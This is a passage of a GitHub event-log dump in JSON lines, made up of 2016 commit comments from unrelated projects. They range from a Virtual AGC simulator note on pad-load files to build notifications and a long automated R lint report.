{"id":"4561448279","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19017481,"position":null,"line":null,"path":null,"commit_id":"3adae84fc13e292f8dc9d171d1c18fec16540da1","created_at":"2016-09-14T11:47:16Z","updated_at":"2016-09-14T11:47:16Z","body":"I made the same mistake with Block 1 of initializing all the erasable to 0, and then when I found that caused me problems, went to the opposite extreme of initializing it all to 0166666 (which is an illegal value since the simulator doesn't use parity, and the 16th bit can never be 1).  This cause me even more problems.  What I did as of yesterday is to add a kind of \"breakpoint\" for the simulator's primitive debugger that can trap all reads of erasable having a value of 0166666, which has allowed me to map out most potential uses of uninitialized memory, which are the addresses you see in the file Solarium055.pad.\r\n\r\nThe .pad file is optionally loaded by the Block 1 simulator at startup, so all those addresses are set to the values shown in the file ... temporarily 0, but I'm trying to map out what they actually do (as you can see with FLAGWRD1), and document them in the .pad file so that I can assign better startup values. \r\n\r\nThe 00203 alarm you saw in yesterday's email isn't actually due to uninitialized erasable, but rather to incorrect bits from the (non-existent) IMU in one of the input registers, IN2, though the pad file could also assign IN2 a value (since in the Block 1 it happens to have an address), and so bad values in input registers could potentially be dealt with by the same pad-load file mechanism.\r\n\r\nI don't think the Block 2 simulator has any similar mechanism for dealing with pad loads, but perhaps you saw the correspondence with @indy91, I think, in which he offered to send over pad-load files (and core dumps for various mission milestones) from NASSP.  If we had those, then the Block 2 simulator could also be made to load this pad-load files at startup.  And of course, custom pad-load files could be created for whatever purpose.\r\n\r\nI believe that my _original_ intention with the Block 2 simulator was simply for someone to enter all the pad-load data from the keypad of the DSKY, and then to save the core-dump file which the simulator creates.  By having the simulator load the same core-dump file at start-up on subsequent occasions (which is a mechanism that the simulator does have in place), the pad-loads would always be automatically correct after that.  That mechanism doesn't have the virtue of documenting the loads, but seems otherwise satisfactory.\r\n\r\nOf course, none of these mechanisms might be very useful for a hardware sim.\r\n"}},"created_at":"2016-09-14T11:47:16Z"}
{"id":"4561453142","type":"CommitCommentEvent","actor":{"login":"xbony2"},"repo":{"name":"Ellpeck/ActuallyAdditions"},"payload":{"comment":{"id":19017492,"position":null,"line":null,"path":null,"commit_id":"541410be5e38a3d951c18c10e38a69d5df319a3e","created_at":"2016-09-14T11:48:22Z","updated_at":"2016-09-14T11:48:22Z","body":"@Ellpeck it would be interesting if this made it work less efficiency; a Solar Panel with full access to the sun should generate more power than one just under a layer of glass."}},"created_at":"2016-09-14T11:48:22Z"}
{"id":"4561456603","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"dior-zj/android_device_xiaomi_dior"},"payload":{"comment":{"id":19017497,"position":null,"line":null,"path":null,"commit_id":"c2353b4ab758afbe0fd71c6a95dcbcb19acedb3b","created_at":"2016-09-14T11:49:16Z","updated_at":"2016-09-14T11:49:16Z","body":"oh. understand ... "}},"created_at":"2016-09-14T11:49:16Z"}
{"id":"4561464414","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"dior-zj/android_device_xiaomi_dior"},"payload":{"comment":{"id":19017514,"position":null,"line":null,"path":null,"commit_id":"ec022ece3f33ea01acb0437341a4c3dcbe558d22","created_at":"2016-09-14T11:51:11Z","updated_at":"2016-09-14T11:51:11Z","body":"\"/sys/bus/i2c/drivers/atmel_mxt_ts/5-004b/keys_off\"  This PATH make SetupWizard FC"}},"created_at":"2016-09-14T11:51:11Z"}
{"id":"4561466109","type":"CommitCommentEvent","actor":{"login":"reyrodrigues"},"repo":{"name":"theirc/Searcher"},"payload":{"comment":{"id":19017518,"position":null,"line":null,"path":null,"commit_id":"8c15cf3a4012839410fb47339eab165694cc6be8","created_at":"2016-09-14T11:51:35Z","updated_at":"2016-09-14T11:51:35Z","body":"No worries folks. Quick and easy fix."}},"created_at":"2016-09-14T11:51:35Z"}
{"id":"4561469183","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19017522,"position":null,"line":null,"path":null,"commit_id":"8bd89c922d527a60d5511a1d8c9d080321478da6","created_at":"2016-09-14T11:52:20Z","updated_at":"2016-09-14T11:52:20Z","body":"Nice!"}},"created_at":"2016-09-14T11:52:20Z"}
{"id":"4561471857","type":"CommitCommentEvent","actor":{"login":"pau1phi11ips"},"repo":{"name":"erocm123/SmartThingsPublic"},"payload":{"comment":{"id":19017529,"position":null,"line":null,"path":null,"commit_id":"7bc3597a91dbdb20ff8e6b462cc36b966bf3b4aa","created_at":"2016-09-14T11:52:57Z","updated_at":"2016-09-14T11:52:57Z","body":"Actually it should be\r\n`multiAttributeTile(name:\"switch\", type: \"generic\"`\r\nnot\r\n`multiAttributeTile(name:\"switch\", type: \"lighting\"`\r\nThe _lighting_ one adds a RGB wheel when pinned as the main device in a room. _generic_ just shows the slider.\r\n\r\n"}},"created_at":"2016-09-14T11:52:57Z"}
{"id":"4561472832","type":"CommitCommentEvent","actor":{"login":"andrew-elder"},"repo":{"name":"AVnu/Open-AVB"},"payload":{"comment":{"id":19017533,"position":4,"line":128,"path":"daemons/gptp/linux/src/linux_hal_persist_file.cpp","commit_id":"15c97ba4409d7f923dbc5ac8fd6c6a6e5349ba2e","created_at":"2016-09-14T11:53:11Z","updated_at":"2016-09-14T11:53:11Z","body":"Please, no printf() output in gPTP. Use the log macros instead."}},"created_at":"2016-09-14T11:53:11Z"}
{"id":"4561479551","type":"CommitCommentEvent","actor":{"login":"lcalvet"},"repo":{"name":"poparteu/openMVG"},"payload":{"comment":{"id":19017543,"position":null,"line":null,"path":null,"commit_id":"966a6ea5c000326a52aa327ac4afdde8bbf99c7e","created_at":"2016-09-14T11:54:42Z","updated_at":"2016-09-14T11:54:42Z","body":"Yes, you can, np."}},"created_at":"2016-09-14T11:54:42Z"}
{"id":"4561480371","type":"CommitCommentEvent","actor":{"login":"fheslouin"},"repo":{"name":"ideascube/ideascube"},"payload":{"comment":{"id":19017546,"position":null,"line":null,"path":null,"commit_id":"1dbb84f36265fbefdab9bb2c60c7aaa6a5606d2c","created_at":"2016-09-14T11:54:54Z","updated_at":"2016-09-14T11:54:54Z","body":"So far this ZIM is only available in French"}},"created_at":"2016-09-14T11:54:54Z"}
{"id":"4561482765","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19017549,"position":8,"line":155,"path":"src/support.cpp","commit_id":"700ce8ef3b4f6037f99ba472bd5b8d3186fddd04","created_at":"2016-09-14T11:55:27Z","updated_at":"2016-09-14T11:55:27Z","body":"But this then causes interfaces to be drawn whenever one of the meshes in this extruder has support interfaces?"}},"created_at":"2016-09-14T11:55:27Z"}
{"id":"4561483424","type":"CommitCommentEvent","actor":{"login":"kartik96"},"repo":{"name":"kartik96/UML-Activity-Diagram-Repository"},"payload":{"comment":{"id":19017552,"position":null,"line":null,"path":null,"commit_id":"55fa35350f6437e16385fc0496be432d757ec3bd","created_at":"2016-09-14T11:55:36Z","updated_at":"2016-09-14T11:55:36Z","body":"bijmdtgrjy"}},"created_at":"2016-09-14T11:55:36Z"}
{"id":"4561488957","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19017565,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-14T11:56:54Z","updated_at":"2016-09-14T11:56:54Z","body":"P.s. In Marshmallow, we also were need to work around wifi re-connection issue: \r\nhttps://github.com/ChronoMonochrome/android_device_samsung_codina/blob/83187eb712a51f35c1f54850da0b12672eaacaa1/patches/frameworks/opt/net/wifi/0001-Fix-wifi-autoconnection.patch\r\nActually it's nothing but hack, though so far I haven't got anything better than that... The whole thing seems to be related to the missing support of CLOCK_BOOTTIME_ALARM in the kernel (I have tried to implement this support without any success)."}},"created_at":"2016-09-14T11:56:54Z"}
{"id":"4561494433","type":"CommitCommentEvent","actor":{"login":"fosterlynn"},"repo":{"name":"valueflows/valueflows"},"payload":{"comment":{"id":19017579,"position":null,"line":null,"path":null,"commit_id":"a9fdc6f9045d858eb45b99d1a2a4044ca775f0ee","created_at":"2016-09-14T11:58:13Z","updated_at":"2016-09-14T11:58:13Z","body":"@pmackay good idea, done."}},"created_at":"2016-09-14T11:58:13Z"}
{"id":"4561494693","type":"CommitCommentEvent","actor":{"login":"fheslouin"},"repo":{"name":"ideascube/ideascube"},"payload":{"comment":{"id":19017581,"position":null,"line":null,"path":null,"commit_id":"20c6e2d41e0848fddb3ff3829720ab43a71f41a9","created_at":"2016-09-14T11:58:16Z","updated_at":"2016-09-14T11:58:16Z","body":"Erf, yes I copied the file from an older conf :("}},"created_at":"2016-09-14T11:58:16Z"}
{"id":"4561496506","type":"CommitCommentEvent","actor":{"login":"HolgerPeters"},"repo":{"name":"blue-yonder/vikos"},"payload":{"comment":{"id":19017588,"position":null,"line":null,"path":null,"commit_id":"6c3227b5c8fe2b077110bb833a97cc8b152933cd","created_at":"2016-09-14T11:58:41Z","updated_at":"2016-09-14T11:58:41Z","body":"Rustfmt's default is 99, so I guess that the rust guidelines specify something like this. I find 80 to be particularly narrow."}},"created_at":"2016-09-14T11:58:41Z"}
{"id":"4561499752","type":"CommitCommentEvent","actor":{"login":"14081217"},"repo":{"name":"14081217/HelloWorld"},"payload":{"comment":{"id":19017597,"position":null,"line":null,"path":null,"commit_id":"4d03cd0502342e50310aeeb50543dac7f3eb3f25","created_at":"2016-09-14T11:59:25Z","updated_at":"2016-09-14T11:59:25Z","body":"#???"}},"created_at":"2016-09-14T11:59:25Z"}
{"id":"4561503436","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017607,"position":null,"line":null,"path":null,"commit_id":"8ebfd73b887c7d50f45d0a984f69e7db06b5a413","created_at":"2016-09-14T12:00:16Z","updated_at":"2016-09-14T12:00:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 55](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13244&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-14T12:00:16Z"}
{"id":"4561503833","type":"CommitCommentEvent","actor":{"login":"RagnarR"},"repo":{"name":"pubnative/pubnative-android-library"},"payload":{"comment":{"id":19017609,"position":null,"line":null,"path":null,"commit_id":"62909fb593ebfdcf8118e4cd0f97715cd4bb74f4","created_at":"2016-09-14T12:00:21Z","updated_at":"2016-09-14T12:00:21Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;xOPfOLqN&#x2F;1217-bug-adchoices-banner-clicking-on-pubnative-logo-causes-no-action\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BUG: Adchoices: Banner, clicking on pubnative logo causes no action</a>"}},"created_at":"2016-09-14T12:00:21Z"}
{"id":"4561505847","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19017616,"position":53,"line":53,"path":"backend/src/main/java/ru/avito/HTTPDownloader/HttpDownloadUtility.java","commit_id":"4bd473e53f15441bf660d5b26381fa9d8bb2f17a","created_at":"2016-09-14T12:00:45Z","updated_at":"2016-09-14T12:00:45Z","body":"debug уровень логирования есть для таких целей."}},"created_at":"2016-09-14T12:00:45Z"}
{"id":"4561506603","type":"CommitCommentEvent","actor":{"login":"comnom"},"repo":{"name":"comnom/Contraband"},"payload":{"comment":{"id":19017619,"position":58,"line":58,"path":"data/hails.txt","commit_id":"7d655462edf9740cb4ab4b4dde3a0c6a76af110f","created_at":"2016-09-14T12:00:55Z","updated_at":"2016-09-14T12:00:55Z","body":"@Bladewood Sorry for the delay boss, it doesn't notify me of comments like this except through email which I rarely check. It should be lowercase, as it's intended as a turn of phrase rather than a proper place. Everything's only a rough first draft right now, and I don't have much time to do work on it besides hosting/managing the project. But feel free to edit whatever and do a PR if you want, the purpose of all of this right now is to give folks a place to try out some simple mission writing and stretch their github legs so they have a good grasp on how everything works in a low pressure environment."}},"created_at":"2016-09-14T12:00:55Z"}
{"id":"4561509096","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19017624,"position":null,"line":null,"path":null,"commit_id":"8ebfd73b887c7d50f45d0a984f69e7db06b5a413","created_at":"2016-09-14T12:01:28Z","updated_at":"2016-09-14T12:01:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 55](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13244&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:12"}},"created_at":"2016-09-14T12:01:28Z"}
{"id":"4561510969","type":"CommitCommentEvent","actor":{"login":"whalo"},"repo":{"name":"tapooll/TextBasedMeme"},"payload":{"comment":{"id":19017627,"position":null,"line":null,"path":null,"commit_id":"94dd5fdf58f726fc2804fe0ebf1383bcc817c681","created_at":"2016-09-14T12:01:53Z","updated_at":"2016-09-14T12:01:53Z","body":">  33,653 additions\r\n\r\naika eeppinen :D"}},"created_at":"2016-09-14T12:01:53Z"}
{"id":"4561511868","type":"CommitCommentEvent","actor":{"login":"1234-"},"repo":{"name":"creativecommons/opened16"},"payload":{"comment":{"id":19017631,"position":null,"line":null,"path":null,"commit_id":"5c1a47998a205943a8a7e60f5527005922054387","created_at":"2016-09-14T12:02:06Z","updated_at":"2016-09-14T12:02:06Z","body":"#[](url)"}},"created_at":"2016-09-14T12:02:06Z"}
{"id":"4561515838","type":"CommitCommentEvent","actor":{"login":"maocan"},"repo":{"name":"maocan/HelloWorld"},"payload":{"comment":{"id":19017644,"position":3,"line":3,"path":"LICENSE.md","commit_id":"e4e1c3b5e7384bfe0c8ce15ae902f1f2eb8a35ac","created_at":"2016-09-14T12:03:01Z","updated_at":"2016-09-14T12:03:01Z","body":"### I want to change the world"}},"created_at":"2016-09-14T12:03:01Z"}
{"id":"4561516125","type":"CommitCommentEvent","actor":{"login":"bengland2"},"repo":{"name":"axboe/fio"},"payload":{"comment":{"id":19017645,"position":null,"line":null,"path":null,"commit_id":"308d69b5d340577b7886696f39753b7ba5ae9e11","created_at":"2016-09-14T12:03:06Z","updated_at":"2016-09-14T12:03:06Z","body":"Jens' fix below should be sufficient.  \r\n\r\nhttps://github.com/axboe/fio/commit/308d69b5d340577b7886696f39753b7ba5ae9e11\r\n"}},"created_at":"2016-09-14T12:03:06Z"}
{"id":"4561516409","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19017646,"position":null,"line":null,"path":null,"commit_id":"47ac7ea05f8bd94593a14e6a9241706b1116d74c","created_at":"2016-09-14T12:03:09Z","updated_at":"2016-09-14T12:03:09Z","body":"[R/ABC_SMC.R:340:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/R/ABC_SMC.R#L340) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:341:53:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/R/ABC_SMC.R#L341) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        if (parameters[j] >= 0 & parameters[1] > 0) { \n                                                    ^\n```\n[R/ABC_SMC.R:341:54:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/R/ABC_SMC.R#L341) *style:* **Trailing whitespace is superfluous.**\n```r\n​        if (parameters[j] >= 0 & parameters[1] > 0) { \n                                                     ^\n```\n[tests/testthat/test_calculate_weight.R:13:37:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_calculate_weight.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​    dunif(x[2], min = 0, max = 1000) \n                                    ^\n```\n[tests/testthat/test_calculate_weight.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_calculate_weight.R#L18) *style:* **lines should not be more than 80 characters.**\n```r\n​      current = c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:18:59:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_calculate_weight.R#L18) *style:* **Commented code should be removed.**\n```r\n​      current = c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_calculate_weight.R#L20) *style:* **lines should not be more than 80 characters.**\n```r\n​      current = c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_calculate_weight.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tset.seed(1) #just to be safe\n^\n```\n[tests/testthat/test_mcmc_nltt.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tp <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tq <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **lines should not be more than 80 characters.**\n```r\n​  tree1 <- TESS::tess.sim.taxa(n=1, nTaxa=100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tLL_BD <- function(params, phy) {\n^\n```\n[tests/testthat/test_mcmc_nltt.R:7:33:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  tree1 <- TESS::tess.sim.taxa(n=1, nTaxa=100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:42:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​  tree1 <- TESS::tess.sim.taxa(n=1, nTaxa=100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                        ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **lines should not be more than 80 characters.**\n```r\n​  tree2 <- TESS::tess.sim.taxa(n=1, nTaxa=100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:33:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  tree2 <- TESS::tess.sim.taxa(n=1, nTaxa=100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:42:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  tree2 <- TESS::tess.sim.taxa(n=1, nTaxa=100, max = 100, lambda = 1.0, mu = 0.0)[[1]]\n                                        ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/testthat/test_mcmc_nltt.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:9:3:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n  ^~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:10:3:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **lines should not be more than 80 characters.**\n```r\n​    lnl <- TESS::tess.likelihood(ape::branching.times(phy), lambda = params[1], mu = params[2],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:11:3:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:12:3:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(lnl + prior1 + prior2)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_mcmc_nltt.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:15:20:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\treturn(lnl + prior1 + prior2)\n                  ~^\n```\n[tests/testthat/test_mcmc_nltt.R:15:29:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\treturn(lnl + prior1 + prior2)\n                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt( q, LL_BD, c(1, 0.0), c(TRUE,TRUE),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"Cannot propose new value for a parameter with value 0.0.\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/47ac7ea05f8bd94593a14e6a9241706b1116d74c/tests/testthat/test_mcmc_nltt.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt( 42, LL_BD, c(1, 0.01), c(TRUE, TRUE), 